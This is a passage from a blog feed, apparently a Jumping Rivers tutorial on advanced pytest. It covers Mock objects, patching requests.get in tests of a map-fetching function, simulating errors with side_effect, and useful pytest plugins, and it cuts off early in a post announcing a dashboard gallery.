&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/test_mock_function.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;unittest.mock&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Mock
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mock_function &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Mock(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_function&amp;#34;&lt;/span&gt;, return_value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This creates a new object called &lt;code&gt;mock_function&lt;/code&gt; which can be used in place of any other function.
The &lt;code&gt;name=&amp;quot;my_function&amp;quot;&lt;/code&gt; argument is a label for the &lt;code&gt;mock_function&lt;/code&gt; which is useful when debugging.
The &lt;code&gt;return_value=2&lt;/code&gt; argument for &lt;code&gt;Mock&lt;/code&gt; means that any time that &lt;code&gt;mock_function()&lt;/code&gt; is called, it will
return &lt;code&gt;2&lt;/code&gt;, regardless of any other arguments passed to &lt;code&gt;mock_function()&lt;/code&gt;.&lt;/p&gt;
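&lt;p&gt;A mock does more than return a fixed value: it also records how it was called. The sketch below is a minimal illustration of that, using a separate mock named &lt;code&gt;fake_lookup&lt;/code&gt; (a hypothetical name, as are the arguments passed to it) together with the standard &lt;code&gt;assert_called_once_with()&lt;/code&gt; and &lt;code&gt;assert_called_with()&lt;/code&gt; methods.&lt;/p&gt;

```python
from unittest.mock import Mock

# A stand-in for a hypothetical function; it returns 2 whatever it is given.
fake_lookup = Mock(name="fake_lookup", return_value=2)

result = fake_lookup(123, key="abc")

# The mock remembers every call, so we can check how it was used.
fake_lookup.assert_called_once_with(123, key="abc")
call_count = fake_lookup.call_count

# Asserting a call that never happened raises AssertionError.
try:
    fake_lookup.assert_called_with("wrong")
    wrong_call_detected = False
except AssertionError:
    wrong_call_detected = True
```

&lt;p&gt;Checks like these are what allow a test to fail when the code under test calls a dependency with unexpected arguments.&lt;/p&gt;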
&lt;p&gt;We can use our &lt;code&gt;mock_function&lt;/code&gt; in a test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/test_mock_function.py (continued)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_mock_function_works&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; mock_function() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; mock_function(&lt;span style="color:#a5d6ff"&gt;123&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;abc&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running the test script shows that &lt;code&gt;mock_function()&lt;/code&gt; always returns 2.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m pytest tests/test_mock_function.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;platform linux -- Python 3.10.12, pytest-8.3.5, pluggy-1.5.0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rootdir: /PATH/pytest-advanced-blog-post
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;collected &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; item
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tests/test_mock_function.py . &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; passed in 0.02s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h1 id="mocking-external-dependencies"&gt;Mocking External Dependencies&lt;/h1&gt;
&lt;p&gt;When testing functions that interact with external systems (such as APIs or databases), it&amp;rsquo;s important to isolate the
code being tested. We want to avoid having our tests make real calls to remote resources, as this could cause failures
due to issues like internet outages or slow database responses. Instead, we use mocks. Pytest supports mocking by
integrating with the &lt;code&gt;unittest.mock&lt;/code&gt; module (here we use the &lt;code&gt;patch&lt;/code&gt; function).&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s consider an example of some code (&lt;code&gt;map.py&lt;/code&gt;) that retrieves and displays a static map image of a geographic location
(Paris in this case).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_at&lt;/span&gt;(lat, long, satellite&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;, zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://static-maps.yandex.ru/1.x/?&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dict(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; z&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;zoom,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;str(size[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(size[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ll&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;str(long) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(lat),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; l&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sat&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; satellite &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lang&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;en_US&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(base, params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;params, timeout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paris_map &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; map_at(&lt;span style="color:#a5d6ff"&gt;48.853&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.3499&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;IPython&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;IPython&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;core&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;display&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Image(paris_map&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this example there is a single function &lt;code&gt;map_at()&lt;/code&gt; that could be tested. Additional code in the script makes
use of that function (&lt;code&gt;paris_map = map_at(...)&lt;/code&gt;). The way the script is written means that whenever it is
loaded as a module (&lt;code&gt;import map&lt;/code&gt;), all of the top-level commands will be evaluated. In particular, when a test
script loads this module, the commands &lt;code&gt;paris_map = map_at(...)&lt;/code&gt; and &lt;code&gt;...Image(paris_map.content)&lt;/code&gt; will run.
You don&amp;rsquo;t want this to happen: running all of the code in an analysis script, just to test that the functions
within it work correctly, slows down your testing routine and, in this case, makes a real network request.&lt;/p&gt;
&lt;p&gt;The top-level code that displays a map of Paris is script-specific. It should run when &lt;code&gt;map.py&lt;/code&gt; is run as a script,
but not when &lt;code&gt;map.py&lt;/code&gt; is imported. The standard Python way to prevent script-specific code from running when a
module is imported is to wrap it in the following block:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# script-specific commands go here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To make testing easier, we can make &lt;code&gt;map.py&lt;/code&gt; a little more import-safe:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;IPython&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_at&lt;/span&gt;(lat, long, satellite&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;, zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Function body is unchanged&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(base, params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;params, timeout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; paris_map &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; map_at(&lt;span style="color:#a5d6ff"&gt;48.853&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.3499&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; IPython&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;core&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;display&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Image(paris_map&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can load the functions from &lt;code&gt;map.py&lt;/code&gt; without having to run all the other script-specific code within it.
The test file (&lt;code&gt;test_map.py&lt;/code&gt;) for &lt;code&gt;map.py&lt;/code&gt; would then be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;unittest.mock&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; patch
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;map&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; map_at
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_build_default_params&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;object(requests, &lt;span style="color:#a5d6ff"&gt;&amp;#34;get&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; mock_get:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; map_at(&lt;span style="color:#a5d6ff"&gt;51.0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mock_get&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;assert_called_with(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://static-maps.yandex.ru/1.x/?&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;z&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;size&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;400,400&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ll&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0,51.0&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;l&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lang&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;en_US&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; timeout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This test checks the behaviour of the &lt;code&gt;map_at&lt;/code&gt; function. Using
&lt;code&gt;unittest.mock.patch.object&lt;/code&gt;, the test replaces &lt;code&gt;requests.get&lt;/code&gt; with a mock, so that no actual network call is made.
It ensures that when &lt;code&gt;map_at&lt;/code&gt; is called with specific coordinates, it issues an HTTP GET request with the expected URL, parameters (zoom level, image size, coordinates, map type and language) and timeout.&lt;/p&gt;
&lt;p&gt;Similarly, you can supply your own replacement when patching a function. Inside the context manager
&lt;code&gt;with patch.object(my_module, &amp;quot;original_function&amp;quot;, mock_function)&lt;/code&gt;,
any call to &lt;code&gt;my_module.original_function()&lt;/code&gt; is replaced with a call to
&lt;code&gt;mock_function()&lt;/code&gt;, and the original function is restored when the block exits.&lt;/p&gt;
&lt;p&gt;Mocking is important in testing because it isolates the code being tested from external dependencies, such as APIs,
databases, or file systems. This allows tests to run faster, as they do not rely on slow or unreliable external
services. Mocking also ensures tests are more predictable and repeatable by simulating specific responses or error
conditions, without making real network requests or modifying external data. This makes tests more focused on the
logic of the code itself, while avoiding unintended side effects.&lt;/p&gt;
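&lt;p&gt;To illustrate simulating an error condition, the sketch below uses the &lt;code&gt;side_effect&lt;/code&gt; argument of &lt;code&gt;Mock&lt;/code&gt; to make a fake &lt;code&gt;get&lt;/code&gt; function raise an exception. The &lt;code&gt;fetch_status&lt;/code&gt; helper and the URL are hypothetical; a real test would more likely patch &lt;code&gt;requests.get&lt;/code&gt; as in the earlier test.&lt;/p&gt;

```python
from unittest.mock import Mock


def fetch_status(get, url):
    """Hypothetical helper: report whether a request succeeded."""
    try:
        get(url, timeout=60)
    except ConnectionError:
        return "unavailable"
    return "ok"


def test_fetch_status_handles_outage():
    # side_effect makes the mock raise instead of returning a value
    failing_get = Mock(side_effect=ConnectionError("network down"))
    assert fetch_status(failing_get, "https://example.com") == "unavailable"
    # The call is still recorded, so its arguments can be checked
    failing_get.assert_called_once_with("https://example.com", timeout=60)
```

&lt;p&gt;No network access is needed, so the failure path can be tested quickly and repeatably.&lt;/p&gt;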
&lt;h1 id="useful-pytest-plugins"&gt;Useful pytest Plugins&lt;/h1&gt;
&lt;p&gt;Pytest&amp;rsquo;s functionality can be extended through a rich ecosystem of
&lt;a href="https://docs.pytest.org/en/stable/reference/plugin_list.html" rel="external"&gt;plugins&lt;/a&gt;. Here are some useful plugins:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;pytest-xdist&lt;/code&gt;: Enables parallel test execution, speeding up test runs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pip install pytest-xdist
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pytest -n auto
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;pytest-cov&lt;/code&gt;: Provides code coverage reports.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pip install pytest-cov
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pytest --cov&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;your_package
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;pytest-mock&lt;/code&gt;: Simplifies mocking by providing a &lt;code&gt;mocker&lt;/code&gt; fixture that wraps &lt;code&gt;unittest.mock&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pip install pytest-mock
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By integrating these advanced pytest features, you can make your tests more efficient, reproducible,
and easier to manage. Don&amp;rsquo;t hesitate to experiment with parametrised fixtures, mocking, and useful
plugins like &lt;code&gt;pytest-cov&lt;/code&gt; and &lt;code&gt;pytest-xdist&lt;/code&gt; to level up your testing.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-testing-advanced/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Announcing the Jumping Rivers Dashboard Gallery</title><link>https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/</link><pubDate>Tue, 15 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-dashboard-app-gallery/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At &lt;em&gt;Jumping Rivers&lt;/em&gt; we love data dashboards and are delighted to announce the release of a
&lt;a href="https://jumpingrivers.com/data-science/gallery/" rel="external"&gt;gallery&lt;/a&gt; to showcase our application-development
skills.&lt;/p&gt;
&lt;p&gt;Tools like
&lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny&lt;/a&gt;,
&lt;a href="https://dash.plotly.com/" rel="external"&gt;Dash&lt;/a&gt;,
&lt;a href="https://streamlit.io/" rel="external"&gt;Streamlit&lt;/a&gt; and
&lt;a href="https://observablehq.com/" rel="external"&gt;Observable&lt;/a&gt; have simplified the process of making interactive, visual,
data products.&lt;/p&gt;
&lt;p&gt;Despite this simplification, our clients often approach us with challenges that step beyond what is
easily achieved in these dashboard frameworks. They may have
&lt;a href="https://www.jumpingrivers.com/tags/accessibility/" rel="external"&gt;&lt;em&gt;accessibility&lt;/em&gt;&lt;/a&gt; requirements, or need
